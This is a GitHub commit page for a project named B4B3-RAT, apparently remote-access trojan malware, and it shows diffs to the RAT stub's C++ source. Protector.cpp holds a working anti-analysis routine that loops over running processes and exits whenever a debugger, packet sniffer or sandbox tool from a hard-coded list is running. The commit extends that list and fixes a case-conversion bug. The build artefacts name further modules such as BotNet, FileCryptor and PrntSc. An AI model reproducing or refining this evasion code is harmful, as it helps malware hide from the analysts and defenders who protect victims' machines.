Skip to content

Commit 2bd57a0

Browse files
author
4b4db4b3
committed
Fix crash
1 parent 3280502 commit 2bd57a0

28 files changed

+46
-41
lines changed

B4B3-RAT/Stub/Manager.cpp

Lines changed: 1 addition & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -124,15 +124,8 @@ std::vector<std::string> Manager::split(std::string str, char delim) {
124124
std::stringstream ss(str);
125125
std::string word;
126126
std::vector<std::string> splittened;
127-
while (std::getline(ss, word, delim))
128-
{
127+
while (std::getline(ss, word, delim)) {
129128
splittened.push_back(word);
130129
}
131130
return splittened;
132-
}
133-
134-
std::string Manager::ToLower(std::string str) {
135-
std::string lower = "";
136-
std::transform(str.begin(), str.end(), lower.begin(), ::tolower);
137-
return lower;
138131
}

B4B3-RAT/Stub/Protector.cpp

Lines changed: 22 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -24,17 +24,15 @@ SOFTWARE.
2424

2525
#include "Protector.h"
2626
#include "Manager.h"
27-
#include <winternl.h>
2827

2928
void Protector::AntiProcesses() {
3029
HANDLE hSnap;
3130
PROCESSENTRY32 pe32;
3231
pe32.dwSize = sizeof(PROCESSENTRY32);
3332

34-
std::vector<std::string> processes =
35-
{
33+
std::vector<std::string> processes = {
3634
"ollydbg.exe",
37-
"ProcessHacker.exe",
35+
"processhacker.exe",
3836
"tcpview.exe",
3937
"autoruns.exe",
4038
"autorunsc.exe",
@@ -44,37 +42,45 @@ void Protector::AntiProcesses() {
4442
"procexp.exe",
4543
"idaq.exe",
4644
"idaq64.exe",
47-
"ImmunityDebugger.exe",
48-
"Wireshark.exe",
45+
"immunitydebugger.exe",
46+
"wireshark.exe",
4947
"dumpcap.exe",
50-
"HookExplorer.exe",
51-
"ImportREC.exe",
52-
"PETools.exe",
53-
"LordPE.exe",
54-
"SysInspector.exe",
48+
"hookexplorer.exe",
49+
"importrec.exe",
50+
"petools.exe",
51+
"lordpe.exe",
52+
"sysinspector.exe",
5553
"proc_analyzer.exe",
56-
"sysAnalyzer.exe",
54+
"sysanalyzer.exe",
5755
"sniff_hit.exe",
5856
"windbg.exe",
5957
"joeboxcontrol.exe",
60-
"joeboxserver.exe"
58+
"joeboxserver.exe",
59+
"windanr.exe",
60+
"q.exe",
61+
"dnspy.exe",
62+
"idapro.exe",
63+
"httpdebugger.exe"
6164
};
6265

66+
size_t size = processes.size();
6367
std::string process = "";
6468
while (true) {
65-
Sleep(3000);
6669
hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
6770
if (hSnap != NULL) {
6871
if (Process32First(hSnap, &pe32)) {
6972
do {
70-
process = Manager::ToLower(pe32.szExeFile);
71-
for (size_t i = 0; i < processes.size(); i++) {
73+
for (size_t i = 0; i < size; i++) {
74+
process = pe32.szExeFile;
75+
std::transform(process.begin(), process.end(), process.begin(),
76+
[](unsigned char c) { return std::tolower(c); });
7277
if (process.find(processes[i]) != std::string::npos) {
7378
ExitProcess(0);
7479
}
7580
}
7681
} while (Process32Next(hSnap, &pe32));
7782
}
7883
}
84+
Sleep(3000);
7985
}
8086
}

B4B3-RAT/Stub/Release/BotNet.obj

56.1 KB
Binary file not shown.

B4B3-RAT/Stub/Release/FileCryptor.obj

58.2 KB
Binary file not shown.

B4B3-RAT/Stub/Release/FileManager.obj

58.1 KB
Binary file not shown.

B4B3-RAT/Stub/Release/Information.obj

56.3 KB
Binary file not shown.

B4B3-RAT/Stub/Release/Manager.obj

53.4 KB
Binary file not shown.

B4B3-RAT/Stub/Release/PrntSc.obj

58.1 KB
Binary file not shown.

B4B3-RAT/Stub/Release/ProcessManager.obj

56.2 KB
Binary file not shown.

B4B3-RAT/Stub/Release/Protector.obj

65.5 KB
Binary file not shown.

0 commit comments

Comments
 (0)